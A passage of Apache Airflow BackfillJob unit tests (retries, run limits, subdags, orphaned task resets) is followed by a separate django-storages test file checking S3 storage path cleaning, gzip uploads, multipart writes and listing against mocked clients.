executor.mock_task_results[
TaskInstanceKey(dag.dag_id, task1.task_id, DEFAULT_DATE, try_number=1)
] = State.UP_FOR_RETRY
executor.mock_task_results[
TaskInstanceKey(dag.dag_id, task1.task_id, DEFAULT_DATE, try_number=2)
] = State.UP_FOR_RETRY
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
def test_backfill_retry_always_failed_task(self, dag_maker):
with dag_maker(
dag_id='test_always_failure_job',
schedule_interval="@daily",
default_args={
'retries': 1,
'retry_delay': datetime.timedelta(seconds=0),
},
) as dag:
task1 = DummyOperator(task_id="task1")
dr = dag_maker.create_dagrun()
executor = MockExecutor(parallelism=16)
executor.mock_task_results[
TaskInstanceKey(dag.dag_id, task1.task_id, dr.run_id, try_number=1)
] = State.UP_FOR_RETRY
executor.mock_task_fail(dag.dag_id, task1.task_id, dr.run_id, try_number=2)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
)
with pytest.raises(BackfillUnfinished):
job.run()
def test_backfill_ordered_concurrent_execute(self, dag_maker):
with dag_maker(
dag_id='test_backfill_ordered_concurrent_execute',
schedule_interval="@daily",
) as dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
runid0 = f'backfill__{DEFAULT_DATE.isoformat()}'
dag_maker.create_dagrun(run_id=runid0)
executor = MockExecutor(parallelism=16)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
runid1 = f'backfill__{(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()}'
runid2 = f'backfill__{(DEFAULT_DATE + datetime.timedelta(days=2)).isoformat()}'
# test executor history keeps a list
history = executor.history
assert [sorted(item[-1].key[1:3] for item in batch) for batch in history] == [
[
('leave1', runid0),
('leave1', runid1),
('leave1', runid2),
('leave2', runid0),
('leave2', runid1),
('leave2', runid2),
],
[('upstream_level_1', runid0), ('upstream_level_1', runid1), ('upstream_level_1', runid2)],
[('upstream_level_2', runid0), ('upstream_level_2', runid1), ('upstream_level_2', runid2)],
[('upstream_level_3', runid0), ('upstream_level_3', runid1), ('upstream_level_3', runid2)],
]
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
session.close()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
executor = MockExecutor(do_update=True)
job = BackfillJob(dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor)
# run with timeout because this creates an infinite loop if not
# caught
try:
with timeout(seconds=5):
job.run()
except AirflowTaskTimeout:
pass
ti = TI(task=dag.get_task('test_backfill_pooled_task'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
@pytest.mark.parametrize("ignore_depends_on_past", [True, False])
def test_backfill_depends_on_past_works_independently_on_ignore_depends_on_past(
self, ignore_depends_on_past
):
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
executor=MockExecutor(),
ignore_first_depends_on_past=ignore_depends_on_past,
).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_depends_on_past_backwards(self):
"""
Test that CLI respects -B argument and raises on interaction with depends_on_past
"""
dag_id = 'test_depends_on_past'
start_date = DEFAULT_DATE + datetime.timedelta(days=1)
end_date = start_date + datetime.timedelta(days=1)
kwargs = dict(
start_date=start_date,
end_date=end_date,
)
dag = self.dagbag.get_dag(dag_id)
dag.clear()
executor = MockExecutor()
job = BackfillJob(dag=dag, executor=executor, ignore_first_depends_on_past=True, **kwargs)
job.run()
ti = TI(dag.get_task('test_dop_task'), end_date)
ti.refresh_from_db()
# runs fine forwards
assert ti.state == State.SUCCESS
# raises backwards
expected_msg = 'You cannot backfill backwards because one or more tasks depend_on_past: test_dop_task'
with pytest.raises(AirflowException, match=expected_msg):
executor = MockExecutor()
job = BackfillJob(dag=dag, executor=executor, run_backwards=True, **kwargs)
job.run()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'dags',
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay-on-limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
assert 0.5 == parsed_args.delay_on_limit
def _get_dag_test_max_active_limits(
self, dag_maker_fixture, dag_id='test_dag', max_active_runs=1, **kwargs
):
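        """Create a four-task, hourly-scheduled DAG with the given max_active_runs."""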
with dag_maker_fixture(
dag_id=dag_id,
schedule_interval="@hourly",
max_active_runs=max_active_runs,
**kwargs,
) as dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
return dag
def test_backfill_max_limit_check_within_limit(self, dag_maker):
dag = self._get_dag_test_max_active_limits(
dag_maker, dag_id='test_backfill_max_limit_check_within_limit', max_active_runs=16
)
dag_maker.create_dagrun()
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
assert 2 == len(dagruns)
assert all(run.state == State.SUCCESS for run in dagruns)
def test_backfill_max_limit_check(self, dag_maker):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dag_run'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
# this session object is different than the one in the main thread
with create_session() as thread_session:
try:
dag = self._get_dag_test_max_active_limits(
dag_maker,
dag_id=dag_id,
)
dag_maker.create_dagrun(
# Existing dagrun that is not within the backfill range
run_id=run_id,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
)
thread_session.commit()
cond.notify()
finally:
cond.release()
thread_session.close()
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
backfill_job_thread = threading.Thread(
target=run_backfill, name="run_backfill", args=(dag_run_created_cond,)
)
dag_run_created_cond.acquire()
with create_session() as session:
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
assert 1 == len(dagruns)
dr = dagruns[0]
assert dr.run_id == run_id
# allow the backfill to execute
# by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
assert 3 == len(dagruns) # 2 from backfill + 1 existing
assert dagruns[-1].run_id == dr.run_id
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self, dag_maker):
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag = self._get_dag_test_max_active_limits(
dag_maker, dag_id='test_backfill_max_limit_check_no_count_existing'
)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
assert 1 == len(dagruns)
assert State.SUCCESS == dagruns[0].state
def test_backfill_max_limit_check_complete_loop(self, dag_maker):
dag = self._get_dag_test_max_active_limits(
dag_maker, dag_id='test_backfill_max_limit_check_complete_loop'
)
dag_maker.create_dagrun()
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
        # Given that the max active dag runs limit is 1, we need to run the
        # backfill job 3 times
success_expected = 2
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
assert success_expected == success_dagruns
assert 0 == running_dagruns # no dag_runs in running state are left
def test_sub_set_subdag(self, dag_maker):
with dag_maker(
'test_sub_set_subdag',
) as dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dr = dag_maker.create_dagrun()
executor = MockExecutor()
sub_dag = dag.partial_subset(
task_ids_or_regex="leave*", include_downstream=False, include_upstream=False
)
job = BackfillJob(dag=sub_dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor)
job.run()
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
assert State.SUCCESS == ti.state
else:
assert State.NONE == ti.state
def test_backfill_fill_blanks(self, dag_maker):
with dag_maker(
'test_backfill_fill_blanks',
) as dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dr = dag_maker.create_dagrun()
executor = MockExecutor()
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor)
with pytest.raises(AirflowException, match='Some task instances failed'):
job.run()
dr.refresh_from_db()
assert dr.state == State.FAILED
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
assert ti.state == State.SUCCESS
elif ti.task_id == op2.task_id:
assert ti.state == State.FAILED
elif ti.task_id == op3.task_id:
assert ti.state == State.SKIPPED
elif ti.task_id == op5.task_id:
assert ti.state == State.UPSTREAM_FAILED
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.timetable = cron_timetable('@daily')
start_date = timezone.utcnow()
executor = MockExecutor()
job = BackfillJob(
dag=subdag, start_date=start_date, end_date=start_date, executor=executor, donot_pickle=True
)
job.run()
subdag_op_task.pre_execute(context={'execution_date': start_date})
subdag_op_task.execute(context={'execution_date': start_date})
subdag_op_task.post_execute(context={'execution_date': start_date})
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
assert 5 == len(subdag_history)
for sdh in subdag_history:
ti = sdh[3]
assert 'section-1-task-' in ti.task_id
with create_session() as session:
successful_subdag_runs = (
session.query(DagRun)
.filter(DagRun.dag_id == subdag.dag_id)
.filter(DagRun.execution_date == start_date)
.filter(DagRun.state == State.SUCCESS)
.count()
)
assert 1 == successful_subdag_runs
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('clear_subdag_test_dag')
subdag_op_task = dag.get_task('daily_job')
subdag = subdag_op_task.subdag
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor, donot_pickle=True
)
with timeout(seconds=30):
job.run()
ti_subdag = TI(task=dag.get_task('daily_job'), execution_date=DEFAULT_DATE)
ti_subdag.refresh_from_db()
assert ti_subdag.state == State.SUCCESS
ti_irrelevant = TI(task=dag.get_task('daily_job_irrelevant'), execution_date=DEFAULT_DATE)
ti_irrelevant.refresh_from_db()
assert ti_irrelevant.state == State.SUCCESS
ti_downstream = TI(task=dag.get_task('daily_job_downstream'), execution_date=DEFAULT_DATE)
ti_downstream.refresh_from_db()
assert ti_downstream.state == State.SUCCESS
sdag = subdag.partial_subset(
task_ids_or_regex='daily_job_subdag_task', include_downstream=True, include_upstream=False
)
sdag.clear(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, include_parentdag=True)
ti_subdag.refresh_from_db()
assert State.NONE == ti_subdag.state
ti_irrelevant.refresh_from_db()
assert State.SUCCESS == ti_irrelevant.state
ti_downstream.refresh_from_db()
assert State.NONE == ti_downstream.state
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
session = settings.Session()
executor = MockExecutor()
job = BackfillJob(
dag=subdag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor, donot_pickle=True
)
dr = DagRun(
dag_id=subdag.dag_id, execution_date=DEFAULT_DATE, run_id="test", run_type=DagRunType.BACKFILL_JOB
)
session.add(dr)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'), run_id=dr.run_id, state=State.REMOVED
)
removed_task_ti.dag_id = subdag.dag_id
dr.task_instances.append(removed_task_ti)
session.commit()
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = (
session.query(TI)
.filter(
TI.dag_id == subdag.dag_id, TI.task_id == task.task_id, TI.execution_date == DEFAULT_DATE
)
.first()
)
assert instance is not None
assert instance.state == State.SUCCESS
removed_task_ti.refresh_from_db()
assert removed_task_ti.state == State.REMOVED
subdag.clear()
dag.clear()
def test_update_counters(self, dag_maker, session):
with dag_maker(dag_id='test_manage_executor_state', start_date=DEFAULT_DATE, session=session) as dag:
task1 = DummyOperator(task_id='dummy', owner='airflow')
dr = dag_maker.create_dagrun()
job = BackfillJob(dag=dag)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 1
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 0
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 1
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 0
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 1
assert len(ti_status.to_run) == 0
ti_status.failed.clear()
# test for retry
ti.set_state(State.UP_FOR_RETRY, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 1
ti_status.to_run.clear()
# test for reschedule
# For rescheduled state, tests that reduced_key is not
# used by upping try_number.
ti._try_number = 2
ti.set_state(State.UP_FOR_RESCHEDULE, session)
assert ti.try_number == 3 # see ti.try_number property in taskinstance module
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 1
ti_status.to_run.clear()
# test for none
ti.set_state(State.NONE, session)
# Setting ti._try_number = 0 brings us to ti.try_number==1
# so that the reduced_key access will work fine
ti._try_number = 0
assert ti.try_number == 1 # see ti.try_number property in taskinstance module
session.merge(ti)
session.commit()
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 1
ti_status.to_run.clear()
session.close()
def test_dag_dagrun_infos_between(self, dag_maker):
with dag_maker(
dag_id='dagrun_infos_between', start_date=DEFAULT_DATE, schedule_interval="@hourly"
) as test_dag:
DummyOperator(
task_id='dummy',
owner='airflow',
)
assert [DEFAULT_DATE] == [
info.logical_date
for info in test_dag.iter_dagrun_infos_between(
earliest=DEFAULT_DATE,
latest=DEFAULT_DATE,
)
]
assert [
DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE,
] == [
info.logical_date
for info in test_dag.iter_dagrun_infos_between(
earliest=DEFAULT_DATE - datetime.timedelta(hours=3),
latest=DEFAULT_DATE,
)
]
def test_backfill_run_backwards(self):
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
executor = MockExecutor(parallelism=16)
job = BackfillJob(
executor=executor,
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True,
)
job.run()
session = settings.Session()
tis = (
session.query(TI)
.join(TI.dag_run)
            .filter(TI.dag_id == 'test_start_date_scheduling', TI.task_id == 'dummy')
.order_by(DagRun.execution_date)
.all()
)
queued_times = [ti.queued_dttm for ti in tis]
assert queued_times == sorted(queued_times, reverse=True)
assert all(ti.state == State.SUCCESS for ti in tis)
dag.clear()
session.close()
def test_reset_orphaned_tasks_with_orphans(self, dag_maker):
"""Create dagruns and ensure only ones with correct states are reset."""
prefix = 'backfill_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
tasks = []
with dag_maker(dag_id=prefix) as dag:
for i in range(len(states)):
task_id = f"{prefix}_task_{i}"
task = DummyOperator(task_id=task_id)
tasks.append(task)
session = settings.Session()
job = BackfillJob(dag=dag)
# create dagruns
dr1 = dag_maker.create_dagrun()
dr2 = dag.create_dagrun(run_id='test2', state=State.SUCCESS)
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
assert 2 == job.reset_state_for_orphaned_tasks()
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
assert ti.state is None
else:
assert state == ti.state
# otherwise not
for state, ti in zip(states, dr2_tis):
assert state == ti.state
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
job.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
assert state == ti.state
def test_reset_orphaned_tasks_specified_dagrun(self, session, dag_maker):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
task_id = dag_id + '_task'
with dag_maker(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval='@daily',
session=session,
) as dag:
DummyOperator(task_id=task_id, dag=dag)
job = BackfillJob(dag=dag)
# make two dagruns, only reset for one
dr1 = dag_maker.create_dagrun(state=State.SUCCESS)
dr2 = dag.create_dagrun(run_id='test2', state=State.RUNNING, session=session)
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.flush()
num_reset_tis = job.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
assert 1 == num_reset_tis
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
assert State.SCHEDULED == ti1.state
assert State.NONE == ti2.state
def test_job_id_is_assigned_to_dag_run(self, dag_maker):
dag_id = 'test_job_id_is_assigned_to_dag_run'
with dag_maker(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily') as dag:
DummyOperator(task_id="dummy_task", dag=dag)
job = BackfillJob(
dag=dag, executor=MockExecutor(), start_date=datetime.datetime.now() - datetime.timedelta(days=1)
)
job.run()
dr: DagRun = dag.get_last_dagrun()
assert dr.creating_job_id == job.id
def test_backfill_has_job_id(self):
"""Make sure that backfill jobs are assigned job_ids."""
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
executor = MockExecutor(parallelism=16)
job = BackfillJob(
executor=executor,
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True,
)
job.run()
assert executor.job_id is not None
@pytest.mark.long_running
@pytest.mark.parametrize("executor_name", ["SequentialExecutor", "DebugExecutor"])
@pytest.mark.parametrize("dag_id", ["test_mapped_classic", "test_mapped_taskflow"])
def test_mapped_dag(self, dag_id, executor_name):
"""
End-to-end test of a simple mapped dag.
We test with multiple executors as they have different "execution environments" -- for instance
DebugExecutor runs a lot more in the same process than other Executors.
"""
# This test needs a real executor to run, so that the `make_list` task can write out the TaskMap
from airflow.executors.executor_loader import ExecutorLoader
self.dagbag.process_file(str(TEST_DAGS_FOLDER / f'{dag_id}.py'))
dag = self.dagbag.get_dag(dag_id)
job = BackfillJob(
dag=dag,
start_date=days_ago(1),
end_date=days_ago(1),
donot_pickle=True,
executor=ExecutorLoader.load_executor(executor_name),
)
job.run()
|
test_s3boto3.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import gzip
import threading
from datetime import datetime
from unittest import skipIf
from botocore.exceptions import ClientError
from django.conf import settings
from django.core.files.base import ContentFile
from django.test import TestCase
from django.utils.six.moves.urllib import parse as urlparse
from django.utils.timezone import is_aware, utc
from storages.backends import s3boto3
try:
from unittest import mock
except ImportError: # Python 3.2 and below
import mock
class S3Boto3TestCase(TestCase):
def setUp(self):
self.storage = s3boto3.S3Boto3Storage()
self.storage._connections.connection = mock.MagicMock()
class S3Boto3StorageTests(S3Boto3TestCase):
def test_clean_name(self):
"""
Test the base case of _clean_name
"""
path = self.storage._clean_name("path/to/somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_clean_name_normalize(self):
"""
Test the normalization of _clean_name
"""
path = self.storage._clean_name("path/to/../somewhere")
self.assertEqual(path, "path/somewhere")
def test_clean_name_trailing_slash(self):
"""
Test the _clean_name when the path has a trailing slash
"""
path = self.storage._clean_name("path/to/somewhere/")
self.assertEqual(path, "path/to/somewhere/")
def test_clean_name_windows(self):
"""
        Test the _clean_name when the path contains Windows-style backslashes
"""
path = self.storage._clean_name("path\\to\\somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_storage_url_slashes(self):
"""
Test URL generation.
"""
self.storage.custom_domain = 'example.com'
# We expect no leading slashes in the path,
# and trailing slashes should be preserved.
self.assertEqual(self.storage.url(''), 'https://example.com/')
self.assertEqual(self.storage.url('path'), 'https://example.com/path')
self.assertEqual(self.storage.url('path/'), 'https://example.com/path/')
self.assertEqual(self.storage.url('path/1'), 'https://example.com/path/1')
self.assertEqual(self.storage.url('path/1/'), 'https://example.com/path/1/')
def test_storage_save(self):
"""
Test saving a file
"""
name = 'test_storage_save.txt'
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'text/plain',
'ACL': self.storage.default_acl,
}
)
def test_content_type(self):
"""
Test saving a file with a None content type.
"""
name = 'test_image.jpg'
content = ContentFile('data')
content.content_type = None
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'image/jpeg',
'ACL': self.storage.default_acl,
}
)
def test_storage_save_gzipped(self):
"""
Test saving a gzipped file
"""
name = 'test_storage_save.gz'
content = ContentFile("I am gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'application/octet-stream',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
def test_storage_save_gzip(self):
"""
Test saving a file with gzip enabled.
"""
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_storage_save_gzip_twice(self):
"""
Test saving the same file content twice with gzip enabled.
"""
# Given
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
# When
self.storage.save(name, content)
self.storage.save('test_storage_save_2.css', content)
# Then
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_compress_content_len(self):
"""
Test that file returned by _compress_content() is readable.
"""
self.storage.gzip = True
content = ContentFile("I should be gzip'd")
content = self.storage._compress_content(content)
self.assertTrue(len(content.read()) > 0)
def test_storage_open_write(self):
"""
Test opening a file in write mode
"""
name = 'test_open_for_writïng.txt'
content = 'new content'
# Set the encryption flag used for multipart uploads
self.storage.encryption = True
self.storage.reduced_redundancy = True
self.storage.default_acl = 'public-read'
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
file.write(content)
obj.initiate_multipart_upload.assert_called_with(
ACL='public-read',
ContentType='text/plain',
ServerSideEncryption='AES256',
StorageClass='REDUCED_REDUNDANCY'
)
# Save the internal file before closing
multipart = obj.initiate_multipart_upload.return_value
multipart.parts.all.return_value = [mock.MagicMock(e_tag='123', part_number=1)]
file.close()
multipart.Part.assert_called_with(1)
part = multipart.Part.return_value
part.upload.assert_called_with(Body=content.encode('utf-8'))
multipart.complete.assert_called_once_with(
MultipartUpload={'Parts': [{'ETag': '123', 'PartNumber': 1}]})
def test_auto_creating_bucket(self):
self.storage.auto_create_bucket = True
Bucket = mock.MagicMock()
self.storage._connections.connection.Bucket.return_value = Bucket
self.storage._connections.connection.meta.client.meta.region_name = 'sa-east-1'
Bucket.meta.client.head_bucket.side_effect = ClientError({'Error': {},
'ResponseMetadata': {'HTTPStatusCode': 404}},
'head_bucket')
self.storage._get_or_create_bucket('testbucketname')
Bucket.create.assert_called_once_with(
ACL='public-read',
CreateBucketConfiguration={
'LocationConstraint': 'sa-east-1',
}
)
def test_storage_exists(self):
self.assertTrue(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key="file.txt",
)
def test_storage_exists_false(self):
self.storage.connection.meta.client.head_object.side_effect = ClientError(
{'Error': {'Code': '404', 'Message': 'Not Found'}},
'HeadObject',
)
self.assertFalse(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key='file.txt',
)
def test_storage_exists_doesnt_create_bucket(self):
with mock.patch.object(self.storage, '_get_or_create_bucket') as method:
self.storage.exists('file.txt')
method.assert_not_called()
def test_storage_delete(self):
self.storage.delete("path/to/file.txt")
self.storage.bucket.Object.assert_called_with('path/to/file.txt')
self.storage.bucket.Object.return_value.delete.assert_called_with()
def test_storage_listdir_base(self):
file_names = ["some/path/1.txt", "2.txt", "other/path/3.txt", "4.txt"]
result = []
for p in file_names:
obj = mock.MagicMock()
obj.key = p
result.append(obj)
self.storage.bucket.objects.filter.return_value = iter(result)
dirs, files = self.storage.listdir("")
self.storage.bucket.objects.filter.assert_called_with(Prefix="")
self.assertEqual(len(dirs), 2)
for directory in ["some", "other"]:
self.assertTrue(directory in dirs,
""" "%s" not in directory list "%s".""" % (
directory, dirs))
